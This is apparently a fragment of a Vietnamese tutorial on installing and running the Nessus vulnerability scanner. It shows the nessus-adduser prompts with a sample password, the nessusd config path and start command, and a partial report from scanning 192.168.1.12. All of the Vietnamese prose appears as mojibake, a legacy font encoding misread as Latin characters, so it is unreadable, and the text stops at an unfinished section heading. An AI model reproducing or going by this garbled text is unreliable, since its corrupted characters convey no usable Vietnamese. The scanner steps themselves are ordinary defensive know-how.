      • - T¹o tµi kho¶n nessusd : TiÖn Ých nessus-adduser cho phÐp t¹o mét tµi kho¶n míi.
      • # nessus-adduser
      • Addition of a new nessusd user
      • ------------------------------
      • Login : renaud
      • Authentication (pass/cert) [pass] : pass
      • Password : secret
      • - CÊu h×nh nessus daemon: Trong file /usr/local/etc/nessus/nessusd.conf ta cã thÓ thiÕt lËp mét sè tuú chän cho nessusd . Th«ng th­êng ë ®ã chóng ta chØ râ c¸c tµi nguyªn mµ ta muèn nessusd sö dông.
      • Sau khi ®· cÊu h×nh nessusd, ta cã thÓ khëi ®éng nessusd b»ng quyÒn root nh­ sau:
      • nessusd -D
      • * CÊu h×nh client
      • PhÇn trªn chóng ta ®· cÊu h×nh nessusd , b©y giê ta cã thÓ thùc hiÖn kÕt nèi ®Õn nã nh­ mét ng­êi dïng b×nh th­êng
      • - Gâ lÖnh nessus tõ dÊu nh¾c dßng lÖnh
    • Sau khi ®· thiÕt lËp xong c¸c tuú chän trªn chóng ta tiÕn hµnh quÐt * KÕt qua thùc hiÖn quÐt trªn m¸y 192.168.1.12 ®­îc cho trong bang sau: 1 Hosts which where alive and responding during test Scan Details This report gives details on hosts that were tested and issues that were found. Please follow the recommended steps and procedures to eradicate these threats. Nessus Scan Report
    • 2. PhÇn mÒm Security Holes Scanner